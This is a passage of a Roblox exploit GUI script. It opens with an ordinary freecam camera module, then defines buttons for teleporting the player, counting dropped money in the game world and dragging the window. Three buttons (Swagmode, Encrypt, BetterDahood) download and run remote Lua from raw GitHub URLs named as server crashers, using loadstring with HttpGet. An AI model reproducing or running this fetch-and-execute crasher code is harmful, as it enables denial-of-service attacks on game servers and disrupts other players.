				local NAV_GAMEPAD_SPEED  = Vector3.new(1, 1, 1)
				local NAV_KEYBOARD_SPEED = Vector3.new(1, 1, 1)
				local PAN_MOUSE_SPEED    = Vector2.new(1, 1)*(pi/64)
				local PAN_GAMEPAD_SPEED  = Vector2.new(1, 1)*(pi/8)
				local FOV_WHEEL_SPEED    = 1.0
				local FOV_GAMEPAD_SPEED  = 0.25
				local NAV_ADJ_SPEED      = 0.75
				local NAV_SHIFT_MUL      = 0.25
	
				local navSpeed = 1
	
				function Input.Vel(dt)
					navSpeed = clamp(navSpeed + dt*(keyboard.Up - keyboard.Down)*NAV_ADJ_SPEED, 0.01, 4)
	
					local kGamepad = Vector3.new(
						thumbstickCurve(gamepad.Thumbstick1.x),
						thumbstickCurve(gamepad.ButtonR2) - thumbstickCurve(gamepad.ButtonL2),
						thumbstickCurve(-gamepad.Thumbstick1.y)
					)*NAV_GAMEPAD_SPEED
	
					local kKeyboard = Vector3.new(
						keyboard.D - keyboard.A + keyboard.K - keyboard.H,
						keyboard.E - keyboard.Q + keyboard.I - keyboard.Y,
						keyboard.S - keyboard.W + keyboard.J - keyboard.U
					)*NAV_KEYBOARD_SPEED
	
					local shift = UserInputService:IsKeyDown(Enum.KeyCode.LeftShift) or UserInputService:IsKeyDown(Enum.KeyCode.RightShift)
	
					return (kGamepad + kKeyboard)*(navSpeed*(shift and NAV_SHIFT_MUL or 1))
				end
	
				function Input.Pan(dt)
					local kGamepad = Vector2.new(
						thumbstickCurve(gamepad.Thumbstick2.y),
						thumbstickCurve(-gamepad.Thumbstick2.x)
					)*PAN_GAMEPAD_SPEED
					local kMouse = mouse.Delta*PAN_MOUSE_SPEED
					mouse.Delta = Vector2.new()
					return kGamepad + kMouse
				end
	
				function Input.Fov(dt)
					local kGamepad = (gamepad.ButtonX - gamepad.ButtonY)*FOV_GAMEPAD_SPEED
					local kMouse = mouse.MouseWheel*FOV_WHEEL_SPEED
					mouse.MouseWheel = 0
					return kGamepad + kMouse
				end
	
				do
					local function Keypress(action, state, input)
						keyboard[input.KeyCode.Name] = state == Enum.UserInputState.Begin and 1 or 0
						return Enum.ContextActionResult.Sink
					end
	
					local function GpButton(action, state, input)
						gamepad[input.KeyCode.Name] = state == Enum.UserInputState.Begin and 1 or 0
						return Enum.ContextActionResult.Sink
					end
	
					local function MousePan(action, state, input)
						local delta = input.Delta
						mouse.Delta = Vector2.new(-delta.y, -delta.x)
						return Enum.ContextActionResult.Sink
					end
	
					local function Thumb(action, state, input)
						gamepad[input.KeyCode.Name] = input.Position
						return Enum.ContextActionResult.Sink
					end
	
					local function Trigger(action, state, input)
						gamepad[input.KeyCode.Name] = input.Position.z
						return Enum.ContextActionResult.Sink
					end
	
					local function MouseWheel(action, state, input)
						mouse[input.UserInputType.Name] = -input.Position.z
						return Enum.ContextActionResult.Sink
					end
	
					local function Zero(t)
						for k, v in pairs(t) do
							t[k] = v*0
						end
					end
	
					function Input.StartCapture()
						ContextActionService:BindActionAtPriority("FreecamKeyboard", Keypress, false, INPUT_PRIORITY,
							Enum.KeyCode.W, Enum.KeyCode.U,
							Enum.KeyCode.A, Enum.KeyCode.H,
							Enum.KeyCode.S, Enum.KeyCode.J,
							Enum.KeyCode.D, Enum.KeyCode.K,
							Enum.KeyCode.E, Enum.KeyCode.I,
							Enum.KeyCode.Q, Enum.KeyCode.Y,
							Enum.KeyCode.Up, Enum.KeyCode.Down
						)
						ContextActionService:BindActionAtPriority("FreecamMousePan",          MousePan,   false, INPUT_PRIORITY, Enum.UserInputType.MouseMovement)
						ContextActionService:BindActionAtPriority("FreecamMouseWheel",        MouseWheel, false, INPUT_PRIORITY, Enum.UserInputType.MouseWheel)
						ContextActionService:BindActionAtPriority("FreecamGamepadButton",     GpButton,   false, INPUT_PRIORITY, Enum.KeyCode.ButtonX, Enum.KeyCode.ButtonY)
						ContextActionService:BindActionAtPriority("FreecamGamepadTrigger",    Trigger,    false, INPUT_PRIORITY, Enum.KeyCode.ButtonR2, Enum.KeyCode.ButtonL2)
						ContextActionService:BindActionAtPriority("FreecamGamepadThumbstick", Thumb,      false, INPUT_PRIORITY, Enum.KeyCode.Thumbstick1, Enum.KeyCode.Thumbstick2)
					end
	
					function Input.StopCapture()
						navSpeed = 1
						Zero(gamepad)
						Zero(keyboard)
						Zero(mouse)
						ContextActionService:UnbindAction("FreecamKeyboard")
						ContextActionService:UnbindAction("FreecamMousePan")
						ContextActionService:UnbindAction("FreecamMouseWheel")
						ContextActionService:UnbindAction("FreecamGamepadButton")
						ContextActionService:UnbindAction("FreecamGamepadTrigger")
						ContextActionService:UnbindAction("FreecamGamepadThumbstick")
					end
				end
			end
	
			local function GetFocusDistance(cameraFrame)
				local znear = 0.1
				local viewport = Camera.ViewportSize
				local projy = 2*tan(cameraFov/2)
				local projx = viewport.x/viewport.y*projy
				local fx = cameraFrame.rightVector
				local fy = cameraFrame.upVector
				local fz = cameraFrame.lookVector
	
				local minVect = Vector3.new()
				local minDist = 512
	
				for x = 0, 1, 0.5 do
					for y = 0, 1, 0.5 do
						local cx = (x - 0.5)*projx
						local cy = (y - 0.5)*projy
						local offset = fx*cx - fy*cy + fz
						local origin = cameraFrame.p + offset*znear
						local part, hit = workspace:FindPartOnRay(Ray.new(origin, offset.unit*minDist))
						local dist = (hit - origin).magnitude
						if minDist > dist then
							minDist = dist
							minVect = offset.unit
						end
					end
				end
	
				return fz:Dot(minVect)*minDist
			end
	
			------------------------------------------------------------------------
	
			local function StepFreecam(dt)
				local vel = velSpring:Update(dt, Input.Vel(dt))
				local pan = panSpring:Update(dt, Input.Pan(dt))
				local fov = fovSpring:Update(dt, Input.Fov(dt))
	
				local zoomFactor = sqrt(tan(rad(70/2))/tan(rad(cameraFov/2)))
	
				cameraFov = clamp(cameraFov + fov*FOV_GAIN*(dt/zoomFactor), 1, 120)
				cameraRot = cameraRot + pan*PAN_GAIN*(dt/zoomFactor)
				cameraRot = Vector2.new(clamp(cameraRot.x, -PITCH_LIMIT, PITCH_LIMIT), cameraRot.y%(2*pi))
	
				local cameraCFrame = CFrame.new(cameraPos)*CFrame.fromOrientation(cameraRot.x, cameraRot.y, 0)*CFrame.new(vel*NAV_GAIN*dt)
				cameraPos = cameraCFrame.p
	
				Camera.CFrame = cameraCFrame
				Camera.Focus = cameraCFrame*CFrame.new(0, 0, -GetFocusDistance(cameraCFrame))
				Camera.FieldOfView = cameraFov
			end
	
			------------------------------------------------------------------------
	
			local PlayerState = {} do
				local mouseIconEnabled
				local cameraSubject
				local cameraType
				local cameraFocus
				local cameraCFrame
				local cameraFieldOfView
				local screenGuis = {}
				local coreGuis = {
					Backpack = true,
					Chat = true,
					Health = true,
					PlayerList = true,
				}
				local setCores = {
					BadgesNotificationsActive = true,
					PointsNotificationsActive = true,
				}
	
				-- Save state and set up for freecam
				function PlayerState.Push()
					for name in pairs(coreGuis) do
						coreGuis[name] = StarterGui:GetCoreGuiEnabled(Enum.CoreGuiType[name])
						StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType[name], false)
					end
					for name in pairs(setCores) do
						setCores[name] = StarterGui:GetCore(name)
						StarterGui:SetCore(name, false)
					end
					local playergui = LocalPlayer:FindFirstChildOfClass("PlayerGui")
					if playergui then
						for _, gui in pairs(playergui:GetChildren()) do
							if gui:IsA("ScreenGui") and gui.Enabled then
								screenGuis[#screenGuis + 1] = gui
								gui.Enabled = false
							end
						end
					end
	
					cameraFieldOfView = Camera.FieldOfView
					Camera.FieldOfView = 70
	
					cameraType = Camera.CameraType
					Camera.CameraType = Enum.CameraType.Custom
	
					cameraSubject = Camera.CameraSubject
					Camera.CameraSubject = nil
	
					cameraCFrame = Camera.CFrame
					cameraFocus = Camera.Focus
	
					mouseIconEnabled = UserInputService.MouseIconEnabled
					UserInputService.MouseIconEnabled = false
	
					mouseBehavior = UserInputService.MouseBehavior
					UserInputService.MouseBehavior = Enum.MouseBehavior.Default
				end
	
				-- Restore state
				function PlayerState.Pop()
					for name, isEnabled in pairs(coreGuis) do
						StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType[name], isEnabled)
					end
					for name, isEnabled in pairs(setCores) do
						StarterGui:SetCore(name, isEnabled)
					end
					for _, gui in pairs(screenGuis) do
						if gui.Parent then
							gui.Enabled = true
						end
					end
	
					Camera.FieldOfView = cameraFieldOfView
					cameraFieldOfView = nil
	
					Camera.CameraType = cameraType
					cameraType = nil
	
					Camera.CameraSubject = cameraSubject
					cameraSubject = nil
	
					Camera.CFrame = cameraCFrame
					cameraCFrame = nil
	
					Camera.Focus = cameraFocus
					cameraFocus = nil
	
					UserInputService.MouseIconEnabled = mouseIconEnabled
					mouseIconEnabled = nil
	
					UserInputService.MouseBehavior = mouseBehavior
					mouseBehavior = nil
				end
			end
	
			local function StartFreecam()
				local cameraCFrame = Camera.CFrame
				cameraRot = Vector2.new(cameraCFrame:toEulerAnglesYXZ())
				cameraPos = cameraCFrame.p
				cameraFov = Camera.FieldOfView
	
				velSpring:Reset(Vector3.new())
				panSpring:Reset(Vector2.new())
				fovSpring:Reset(0)
	
				PlayerState.Push()
				RunService:BindToRenderStep("Freecam", Enum.RenderPriority.Camera.Value, StepFreecam)
				Input.StartCapture()
			end
	
			local function StopFreecam()
				Input.StopCapture()
				RunService:UnbindFromRenderStep("Freecam")
				PlayerState.Pop()
			end
	
			------------------------------------------------------------------------
	
			do
				local enabled = false
	
				local function ToggleFreecam()
					if enabled then
						StopFreecam()
					else
						StartFreecam()
					end
					enabled = not enabled
				end
	
				local function CheckMacro(macro)
					for i = 1, #macro - 1 do
						if not UserInputService:IsKeyDown(macro[i]) then
							return
						end
					end
					ToggleFreecam()
				end
	
				local function HandleActivationInput(action, state, input)
					if state == Enum.UserInputState.Begin then
						if input.KeyCode == FREECAM_MACRO_KB[#FREECAM_MACRO_KB] then
							CheckMacro(FREECAM_MACRO_KB)
						end
					end
					return Enum.ContextActionResult.Pass
				end
	
				ContextActionService:BindActionAtPriority("FreecamToggle", HandleActivationInput, false, TOGGLE_INPUT_PRIORITY, FREECAM_MACRO_KB[#FREECAM_MACRO_KB])
			end
		end))
		for i,v in pairs(mas:GetChildren()) do
			v.Parent = game:GetService("Players").LocalPlayer.PlayerGui
			pcall(function() v:MakeJoints() end)
		end
		mas:Destroy()
		for i,v in pairs(cors) do
			spawn(function()
				pcall(v)
			end)
		end
	end)
end
coroutine.wrap(UFDYOAH_fake_script)()
local function ZRBJPZ_fake_script() -- AdminBase.LocalScript 
	local script = Instance.new('LocalScript', AdminBase)

	script.Parent.MouseButton1Down:Connect(function()
		game.Players.LocalPlayer.Character:FindFirstChild('HumanoidRootPart').CFrame = CFrame.new(-872.030029296875, -38.401187896728516, -585.260009765625)
	end)
end
coroutine.wrap(ZRBJPZ_fake_script)()
local function VOZW_fake_script() -- Swagmode.LocalScript 
	local script = Instance.new('LocalScript', Swagmode)

	script.Parent.MouseButton1Down:Connect(function()
		loadstring(game:HttpGet('https://raw.githubusercontent.com/lerkermer/lua-projects/master/SuperCustomServerCrasher'))()
	end)
end
coroutine.wrap(VOZW_fake_script)()
local function FZUXI_fake_script() -- Encrypt.LocalScript 
	local script = Instance.new('LocalScript', Encrypt)

	script.Parent.MouseButton1Down:Connect(function()
		loadstring(game:HttpGet('https://raw.githubusercontent.com/remorseW/encryptW/main/CustomEncryptCrasher.lua'))()
	end)
end
coroutine.wrap(FZUXI_fake_script)()
local function KOWY_fake_script() -- BetterDahood.LocalScript 
	local script = Instance.new('LocalScript', BetterDahood)

	script.Parent.MouseButton1Down:Connect(function()
		loadstring(game:HttpGet('https://raw.githubusercontent.com/BetterDaHood/BetterDaHoodCrasher/main/Crash'))()
	end)
end
coroutine.wrap(KOWY_fake_script)()
local function FJDLO_fake_script() -- CashCoutner.LocalScript 
	local script = Instance.new('LocalScript', CashCoutner)

	while wait() do
		pcall(function()
			local amount = 0
			for i,v in pairs(game.Workspace.Ignored.Drop:GetChildren()) do
				if v.Name == "MoneyDrop" then
					local cash = string.split(v.BillboardGui.TextLabel.Text,"$")[2]
					if string.match(cash,',') then
						amount = amount + cash:gsub("%,","")
					else
						amount = amount + cash
					end
				end
			end
			local function checking(amount)
				amount = tostring(amount)
				return amount:reverse():gsub("%d%d%d", "%1,"):reverse():gsub("^,", "")
			end
			script.Parent.Text = "$"..checking(amount).." "
		end)
	end
end
coroutine.wrap(FJDLO_fake_script)()
local function WQKFL_fake_script() -- ImageLabel.LocalScript 
	local script = Instance.new('LocalScript', ImageLabel)

	local UIS = game:GetService('UserInputService')
	local frame = script.Parent
	local dragToggle = nil
	local dragSpeed = 0.25
	local dragStart = nil
	local startPos = nil
	
	local function updateInput(input)
		local delta = input.Position - dragStart
		local position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X,
			startPos.Y.Scale, startPos.Y.Offset + delta.Y)
		game:GetService('TweenService'):Create(frame, TweenInfo.new(dragSpeed), {Position = position}):Play()
	end
	
	frame.InputBegan:Connect(function(input)
		if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then 
			dragToggle = true
			dragStart = input.Position
			startPos = frame.Position
			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragToggle = false
				end
			end)
		end
	end)
	
	UIS.InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
			if dragToggle then
				updateInput(input)
			end
		end
	end)
end
coroutine.wrap(WQKFL_fake_script)()
